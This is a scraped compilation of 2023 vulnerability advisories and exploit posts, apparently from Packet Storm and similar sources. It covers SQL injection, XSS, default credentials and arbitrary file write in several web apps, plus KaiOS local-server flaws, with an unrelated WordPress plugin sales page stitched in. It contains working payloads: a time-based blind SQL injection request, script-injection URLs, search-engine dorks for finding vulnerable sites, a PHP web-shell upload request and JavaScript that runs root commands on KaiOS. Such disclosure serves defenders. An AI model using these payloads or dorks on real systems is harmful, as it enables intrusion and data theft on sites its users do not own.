LeadPro CRM version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: LeadPro CRM v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578# Demo Site: https://demo.leadifly.in# Tested on: Kali Linux# CVE: N/A### Request ###GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10HTTP/1.1Host: localhostCookie:XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D;leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestX-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6VAuthorization: BearereyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8X-Xsrf-Token:eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=Referer: https://localhost/admin/productSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close### Parameter & Payloads ###Parameter: filters (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload:fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=namelk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND(8549=8549&order=id desc&offset=0&limit=10

LeadPro CRM 1.0 SQL Injection

Esg version 2.5 suffers from a cross site scripting vulnerability.

**Esg 2.5 Cross Site Scripting**

Posted May 24, 2023

Authored by indoushka

Esg version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | af04171eca15deed52f8552f83c674dd50fbac0bfc4810eb316c96bde1b17488

Download | Favorite | View

**Esg 2.5 Cross Site Scripting**

    ===========================================================================================| # Title     : Esg 2.5 XSS Vulnerability                                                 || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>Greetings to :===================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|=================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,187)
*   Arbitrary (16,018)
*   BBS (2,859)
*   Bypass (1,690)
*   CGI (1,024)
*   Code Execution (7,128)
*   Conference (677)
*   Cracker (841)
*   CSRF (3,315)
*   DoS (23,129)
*   Encryption (2,360)
*   Exploit (51,088)
*   File Inclusion (4,193)
*   File Upload (952)
*   Firewall (821)
*   Info Disclosure (2,712)
*   Intrusion Detection (883)
*   Java (2,998)
*   JavaScript (838)
*   Kernel (6,550)
*   Local (14,376)
*   Magazine (586)
*   Overflow (12,597)
*   Perl (1,421)
*   PHP (5,123)
*   Proof of Concept (2,302)
*   Protocol (3,559)
*   Python (1,499)
*   Remote (30,474)
*   Root (3,552)
*   Rootkit (505)
*   Ruby (607)
*   Scanner (1,633)
*   Security Tool (7,845)
*   Shell (3,159)
*   Shellcode (1,211)
*   Sniffer (892)
*   Spoof (2,189)
*   SQL Injection (16,219)
*   TCP (2,394)
*   Trojan (687)
*   UDP (883)
*   Virus (664)
*   Vulnerability (31,548)
*   Web (9,548)
*   Whitepaper (3,742)
*   x86 (958)
*   XSS (17,668)
*   Other

**File Archives**

*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,970)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,746)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,312)
*   HPUX (879)
*   iOS (342)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,712)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,293)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,597)
*   UNIX (9,230)
*   UnixWare (186)
*   Windows (6,554)
*   Other

Esg 2.5 Cross Site Scripting

The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_postdata' function in versions up to, and including, 3.3.19. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin to modify access to the plugin when it should only be the administrator's privilege.

****Go Pricing** Current Version 3.3.19 – June 18, 2021****Create amazing WordPress Pricing & Compare Tables**

It’s super easy to create WordPress pricing or compare tables with Go Pricing. If you buy this product, you won’t need anything else.

These WordPress Pricing Tables support various Media Elements like Audio, Video, Image or Map. Just give it a try! We are sure you will never use any other table plugin.

For more information please scroll down!

  
**Key Features**

**Easy to Use Admin Interface** – Edit your tables quickly and swiftly with our clean UI. There are help texts, colours, icons to help you in the efficient navigation.

**Various Media Types** – Make your tables more unique and engaging by adding content types like: Audio, Video or Map.

**Google Fonts** – Take full use of the complete Google font set and find the best matching one to your site.

**2000+ Font Icons** – Font Awesome, Icomoon, Linecon & Material Icons give you scalable vector icons that can be instantly customized, and they will look gorgeous on high-resolution displays.

**Live Preview** – This function will enable you to see how your will look Pricing Table in real time.

**Bulk Actions** – You can perform various operations on the dashboard with multiple tables, like: cloning, exporting, deleting.

**Column Animations** – Give some vibe to your tables! Choose any of the 39 amazing transitions for each and every column according to your taste.

**Customisable Responsivity** – Thanks to the various configuration options you can make sure that your table provides the best possible experience on any device.

**Import & Export functions** – You can swiftly import demo tables, create or restore backups, and move your data between sites.

**Built-in Plugin Update** – You can keep your installed version up to date and utilise all the latest fixes, features and improvements.

**Small Footprint** – You can ensure that the content is only loaded when it is necessary.

**Classic and Modern in one? Yes.**  
If you like traditional _WordPress Pricing Tables_, but you would like to get much more, then you are at the right place. You will get all the usual pricing table features, and our plugin also supports Videos (Youtube, Vimeo, Screenr) and Images optional responsivity. Enjoy this _easy and quick_ way of creating stunning tables, and integrating them into your existing WordPress site was never easier thanks to our Admin Panel. You will surely find the one from our ready made, but customizable demo tables that fits the best for you.

**What else can I do with Go Pricing Tables? We have some ideas.  
**Beside traditional _Pricing Tables_ features the plugin is suitable for creating Team Viewer and Compare Tables. These features can also be found in the package.

**Is the system flexible? Yes.  
**The responsivity is optional. It can be turned On and Off and customizable to adapt to your site or CSS framework (e.g. Bootstrap). You can use System or any Google Web Fonts (650+).

**Can I use more than one table on my site? Yes.**  
You can use any number of tables on your site, or even on one single page using shortcodes.

**Style & Layout**

*   Column Animation  
    *   Column Transition
    *   Price Counter
*   Text based ribbon (CSS)  
*   Unlimited colors and color combination of columns
*   Unlimited and different number of rows in Body and Footer
*   Any number of columns up to 10
*   Configurable column space and border radius
*   Standard and circle Header Styles
*   Advanced row and column height Equalization System
*   Numerous column shadow and sign options
*   Unlimited buttons in Body and Footer
*   Unique tooltip style
*   Paypal and s2Member button shortcode support
*   650+ Google Web Font
*   1900+ Font icons  
    *   Font Awesome
    *   Icomoon
    *   Linecon
    *   Material Icons
*   250+ Starter Template
    *   90+ Classic Style
    *   150+ Clean Style

**Responsivity**

*   Optional and customizable responsivity per tables
*   Configurable Breakpoints and number of columns

*   Responsive Images
*   Audio
    *   SoundCloud
    *   Mixcloud
    *   Beatport
    *   HTML5 audio
*   Video
    *   YouTube
    *   Vimeo
    *   Screenr
    *   Dailymotion
    *   Metacafe
    *   HTML5 video
*   Google Map – Classic, Clean and custom pins
*   Custom iFrame

**Modern user-friendly Admin Interface**

*   Optionally Ajaxified Admin
*   Help System
*   Advanced Table Dashboard
    *   Searching and Sorting possibilities
    *   Cloning and Deleting bulk actions
*   Update Notification and built-in Update functionality  
*   Visual Table Editor – Sort, Delete and Clone columns and rows
*   Advanced data Export and Import
*   Built-in Live Preview with responsivity settings
*   Visual Composer compatibility

**Supports the Latest Web Technologies**

*   Supports all modern browsers on the market
    *   Chrome
    *   Firefox
    *   Safari
    *   Opera
    *   Internet Explorer (9+)
*   Touch support for mobile devices, including iOS, Android, and Windows

**Other**

*   Layered PSDs for signs and pins
*   Translation ready with .mo .po files

**Quality & Originality**

Our goal is the best quality, however issues may occur which we try to fix quickly. We continuously monitor customer feedbacks and suggestions. Always use the latest version of this product.

  
**Changelog**

**v3.3.19 – June 18, 2021**

*   \[FIX\] PHP 7.4 compatibility issues fix in frontend
*   \[FIX\] Minor backend CSS fixes

**v3.3.18 – December 28, 2020**

*   \[FIX\] WordPress 5.6 compatibility issues fix in backend and frontend
*   \[FIX\] Minor frontend JavaScript fixes

**v3.3.17 – March 05, 2020**

*   \[IMPROVEMENT\] New tooltip position possibilities and automatic alignment on mobiles
*   \[FIX\] Fix for tooltip “cut-off” issue on mobiles

**v3.3.16 – November 14, 2019**

*   \[FIX\] WordPress 5.3 compatibility issue fix

**v3.3.15 – July 8, 2019**

*   \[IMPROVEMENT\] Minor improvements in PHP code
*   \[IMPROVEMENT\] Cornerstone Page Builder integration

**v3.3.14 – Jan 21, 2019**

*   \[FIX\] PHP 7+ Compatibility issue fix
*   \[IMPROVEMENT\] Minor CSS improvement in the frontend CSS

**v3.3.13 – Aug 16, 2018**

*   \[IMPROVEMENT\] Improved API caching to prevent slow down of the admin page loading if API is unavailable

We are frequently releasing new features and bufixes to the plugin, so it is strongly recommended to keep it up do date, to make sure that you utilise all the latest fixes, features and improvements!

**View our Changelog details**

CVE-2023-2494: Go Pricing - WordPress Responsive Pricing Tables

Stored Cross Site Scripting (XSS) vulnerability in the add contact function CiviCRM 5.59.alpha1, allows attackers to execute arbitrary code in first/second name field.

    # Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)# Date: 2023-02-02# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://civicrm.org# Software Link: https://civicrm.org/download# Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)# CVE: CVE-2023-25440 / Vendor Security Advisory: CIVI-SA-2023-05Description:A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary webscripts or HTML.Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second namefield, it will be triggered once page gets loaded.Steps to reproduce:- Quick Add contact to CiviCRM,- Insert a payload PoC inside the field(s)- Click on 'Add contact'.If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.Timeline:2023-01-29: Vulnerability discovered2023-02-02: Request for CVE reservation2023-02-04: Vendor contacted2023-02-06: Vendor replies, acknowledgments and coordinating for advisory2023-02-14: Vendor discloses Security advisory and credits, internal id: CIVI-SA-2023-052023-02-15: Vendor Security Advisory publication on https://civicrm.org/advisory/civi-sa-2023-05-quick-add-widget2023-04-27: Assigned CVE number: CVE-2023-254402023-05-18: CVE publication / disclosure

CVE-2023-25440: CiviCRM 5.59.alpha1 Cross Site Scripting ≈ Packet Storm

In Wcms 0.3.2, an attacker can send a crafted request from a vulnerable web application backend server /wcms/wex/html.php via the finish parameter and the textAreaCode parameter. It can write arbitrary strings into custom file names and upload any files, and write malicious code to execute scripts to trigger command execution.

Hi, dev team! The code in this file is vulnerable: Arbitrary file write And execute the command through this file

**Vulnerability discovery**

Vulnerable code found on lines 20 to 23 in the /wcms/wex/html.php file

if (isset($\_GET\['finish'\])) {
    $path = $\_GET\['finish'\];
    file\_put\_contents($path, $\_POST\['textAreaCode'\]);

Since the finish variable of the GET request and the textAreaCode variable of the POST request are controllable, an attacker can use the file\_put\_contents function to write malicious code into a custom file

**construct poc**

Use controllable variables to write malicious code into the shell.php file in the current directory  
The payload is as follows：

    POST /wangmarket-master/wcms-0.3.2/wcms/wex/html.php?finish=shell.php HTTP/1.1
    Host: 192.168.3.10
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=pdvblj8k9q6rin0oroe36m6s77
    Upgrade-Insecure-Requests: 1
    Content-Length: 36
    
    textAreaCode=<?php system('whoami');?>
    

  
It can be seen that the write is successful  

**get shell**

Access the written malicious file, find that the malicious code is successfully executed, and echo it out

CVE-2023-31689: Arbitrary file write vulnerability in /wcms/wex/html.php · Issue #15 · vedees/wcms

hyiplab version 2.1 leaves a default set of administrative credentials installed post installation.

    ====================================================================================================================================| # Title     : hyiplab V2.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://appdevs.net/                                                                                               |  | # Dork      : "Every balance subtracting transactions need OTP verification so You can feel safe about your funds."              |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin  & pass= admin[+] https://127.0.0.1/hyiplab/admin/dashboardGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

hyiplab 2.1 Default Credentials

Esg version 2.5 suffers from a remote SQL injection vulnerability.

    ===========================================================================================| # Title     : Esg 2.5 Sql Injection Vulnerability                                       || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : news.php?tayear=2023[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?tayear=2023 <==== inject here[+] Panel : /admin/login.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Esg 2.5 SQL Injection

Code Bakers version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Code Bakers v1.0 SQL injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.codebakers.co.uk/                                                                                      |  | # Dork      : "dishes.php?res_id="                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /dishes.php?res_id= <===== inject here [+] https://127.0.0.1/talwarabazaar.com/dishes.php?res_id=5Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Code Bakers 1.0 SQL Injection

An issue was discovered in KaiOS 3.0 and 3.1. The binary /system/kaios/api-daemon exposes a local web server on *.localhost with subdomains for each installed applications, e.g., myapp.localhost. An attacker can make fetch requests to api-deamon to determine if a given app is installed and read the manifest.webmanifest contents, including the app version.

**CVE-2023-33293: Verify Installed App Version on KaiOS 3.0 & 3.1**

Vendor: KaiOS Technologies Inc.  
Vendor URL: https://www.kaiostech.com/  
Versions affected: KaiOS 3.0, KaiOS 3.1  
Systems Affected: KaiOS-based mobile devices  
Author: Tom Barrasso  
CVE Identifier: CVE-2023-33293  
Risk: Low

**Summary**

KaiOS is a mobile operating system based on Firefox OS. The operating system comes with the api-daemon binary exposing a local web server that responds to HTTP requests on port 80 under the hostname localhost. This server also exposes subdomains for each installed applications, http://myapp.localhost, as well as reserved hostnames cached.localhost for cached Progressive Web Apps (PWAs) and shared.localhost for a bundle of shared system resources. These can be used to fetch assets that are part of the application's bundle.  

**Location**

*   Source: /system/kaios/api-daemon

**Impact**

An attacker can make fetch requests to determine if a given app is installed. Given that KaiOS 3.0 has about ~400 apps available, it's easily feasible to replicate the process to return all installed apps.  
Exposing whether the user has a given app installed can be used for digital fingerprinting as well as targeted phishing. Additionally, because the manifest is returned in the HTTP response with proper CORS headers, it is also possible to extract additional information such as the app version.  

**Recommendation**

api-daemon should check the Origin header and only return valid responses for the same application, or to shared.localhost. These checks could be further extended to encompass Digital Asset Links validation used by Android and iOS to allow a website to check if related apps are installed. This approach is more robust but would allow websites, not just apps, to check if their corresponding app is installed.

**Demo**

This demo lists all installed applications and their installed version. It does not check installed PWAs, but cound be adapted to check http://cached.localhost/myapp/.

**KaiOS Version**:

**App List**  

**Vendor Communication Timeline**

*   5/2/23: Tom emailed security@kaiostech.com asking for PGP key used for secure communication.
*   5/5/23: Tom disclosed issues to KaiOS Technologies.
*   5/8/23: KaiOS Technologies acknowledged this issue.
*   5/15/23: Tom asked for the current remediation status.

CVE-2023-33293: KaiOS 3.0 App Install Exposure

An issue was discovered in KaiOS 3.0 before 3.1. The /system/bin/tctweb_server binary exposes a local web server that responds to GET and POST requests on port 2929. The server accepts arbitrary Bash commands and executes them as root. Because it is not permission or context restricted and returns proper CORS headers, it's accessible to all websites via the browser. At a bare minimum, this allows an attacker to retrieve a list of the user's installed apps, notifications, and downloads. It also allows an attacker to delete local files and modify system properties including the boolean persist.moz.killswitch property (which would render the device inoperable). This vulnerability is partially mitigated by SELinux which prevents reads, writes, or modifications to files or permissions within protected partitions.

**CVE-2023-33294: Execute Commands as Root from KaiOS 3.0 Browser via TCT Web Server**

Vendor: KaiOS Technologies Inc.  
Vendor URL: https://www.kaiostech.com/  
Versions affected: KaiOS 3.0  
Systems Affected: KaiOS-based mobile devices  
Author: Tom Barrasso  
CVE Identifier: CVE-2023-33294  
Risk: Critical

**Summary**

KaiOS is a mobile operating system based on Firefox OS. KaiOS 3.0 comes shipped with a binary, tctweb_server, exposing a local web server that responds to HTTP requests on port 2929. This server responds to GET and POST requests, accepting a application/x-www-form-urlencoded formatted request body with key-value tuples separated by '&', with a '='.  
tctweb_server runs as root. It supports pre-defined commands for getting & setting system properties, reading & writing NV items, and reading files. It also allows for execution of user-provided bash commands. Because the server is exposed on http://127.0.0.1:2929, and it returns the header Access-Control-Allow-Origin: * with every request, it is accessible to all installed apps and websites the system browser.

**Location**

*   Source: /system/bin/tctweb_server

**Impact**

Because tctweb_server runs as root, accepts arbitrary bash commands, and is accessible via the system browser, it has a very high potential for abuse. This risk is partially mitigated by SELinux enforcement. As a result, tctweb_server cannot be used to read, write, or modify files or permissions within protected partitions.  
The following are examples of what can be accomplished simply by visiting a malicious website on a KaiOS 3.0 device.

*   Using cmdshell=readfile to get the list of installed applications (system/b2g/webapps/webapps.json), or user profile data including notifications and downloads (folder: data/b2g/mozilla/*.default/, files: downloads.json, notifications.json)
*   Modifying or deleting local files, i.e. in sdcard/
*   Bricking the device by enabling the kill switch system property persist.moz.killswitch

An attacker can make XMLHttpRequest or fetch requests to http://127.0.0.1:2929 with parameters to run commands as root. In this simple example, the contents of the build.prop file are displayed on screen. 
let xhr = new XMLHttpRequest();
xhr.open('POST', 'http://127.0.0.1:2929', true);
xhr.send('cmd=bash&cmdshell=readfile&filename=system/build.prop');
  

**Recommendation**

Given the strong potential for abuse, the tctweb_server binary should either be permission-restricted to only certified apps or removed altogether. Analysis of builds from the Nokia 2780 Flip suggests that tctweb_server was removed in KaiOS 3.1.

**Demo**

This demo displays the contents of build.prop on sceen.

**KaiOS Version**:

**build.prop**  

**Vendor Communication Timeline**

*   5/2/23: Tom emailed security@kaiostech.com asking for PGP key used for secure communication.
*   5/5/23: Tom disclosed issues to KaiOS Technologies.
*   5/8/23: KaiOS Technologies acknowledged this issue.
*   5/15/23: Tom asked for the current remediation status.

Tag

#firefox